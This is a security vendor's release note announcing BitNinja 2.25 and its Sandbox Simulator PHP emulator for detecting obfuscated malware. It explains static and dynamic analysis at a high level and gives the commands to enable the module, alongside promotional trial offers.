The Ninjas are working day’n’night to find the perfect solution against obfuscated malware. Last year, we invented a unique detection technique, the Source Code Structure Analysis. This month, we have made another breakthrough.
BitNinja 2.25 is here, and it brings many new features, most notably a new malware scanner mechanism. With this new feature, you can analyze old PHP files on the servers and discover the most recent zero-day attacks, even if they are obfuscated.
First, let’s discuss what obfuscated malware is.
Obfuscation attempts to hide the real intention of a program. The hacker writes a code that is not readable by humans, but the functionality behind it remains the same. So, when you run the program, it behaves like the encapsulated program it was created for.
When we talk about malware, there are two different types of analysis: static and dynamic.
The static analysis includes hash algorithms, string matching, code-based detection, and also our award-winning invention, the source code structure analysis.
And what do we call dynamic analysis? During the dynamic analysis, the system observes the program’s behavior after you have run the source code partially or entirely.
If you find the obfuscation mechanism, you can deobfuscate the code. After that, you can decapsulate the real program and match the deobfuscated source code. But unfortunately, there are too many obfuscation techniques. It is hard to deobfuscate the code, and other aspects are difficult to analyze without running the code at least partially.
Another technique is from the output when you analyze the output of the program. Most of the time, when you run a malware, you can find traces of malicious behavior from the output.
Within the confines of the “Function Calls” analysis, you run the code and find which functions are used for malicious activities.
You can see in this picture that this program contains something “phishy”. It’s always suspicious when a source code includes function names like explode and basic commands used to decode interesting variable names.
It can happen with real files or within a simulated environment to safely analyze file manipulations.
You can also do multi-path execution when you analyze what would happen if you forced the interpreter into a code branch. With this method, you can find locked code parts, and it is also helpful in discovering malicious behaviors.
Sandboxing is one way to use these techniques if you have a couple of special servers for this purpose.
These servers can spin up virtual servers. You upload the PHP file to it, run the code and use the above-mentioned analyzing methods. The disadvantage of sandboxing is that it takes around 20 seconds to analyze one PHP file. Analyzing all of your PHP files would take a lot of time and eat up too many resources.
We added a new module to the BitNinja system we named Sandbox Simulator. It’s a PHP emulator, which runs the PHP files on the server in a safe environment and automatically analyses the file’s behavior. It also analyzes the old PHP files on the servers. With the Sandbox Simulator, we can easily discover the most recent zero-day malware, even if they are obfuscated.
In the video below, our Ninja, Mark, shows you how the PHP simulator works. You can find the malware snippet that Mark used here.
bitninjacli --module=SandboxScanner --enable(You can disable it with: bitninjacli --module=SandboxScanner --disable)
When the PHP scanner finds a malicious file, it creates a validating signature from it. We wrote about our validating process in our previous release note. Make sure only to validate signatures that are legitimately malware, or please feel free to contact us so we can assist you with a suspicious signature.
Would you like to participate in developing our most recent innovation? We still have some new ideas to improve the Malware Detection module, and we are looking for people who would like to help us test the first version and give feedback about the user experience.
If you are interested in it, reach out to our product manager, Adam.
Cybersecurity is not optional anymore. It is a must! If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card needed!
We are always happy to help you! If you have any questions, check out our Knowledgebase, feel free to ask at [email protected], or you can even reach us on the Dashboard chat!
Let’s make the internet a safer place together!
Start the 7-day free trial with full functionality without spending a cent.
After the “Hello, Peppa!” zero-day botnet, our Attack Vector Miner detected another zero-day...
At the end of the last year, we made...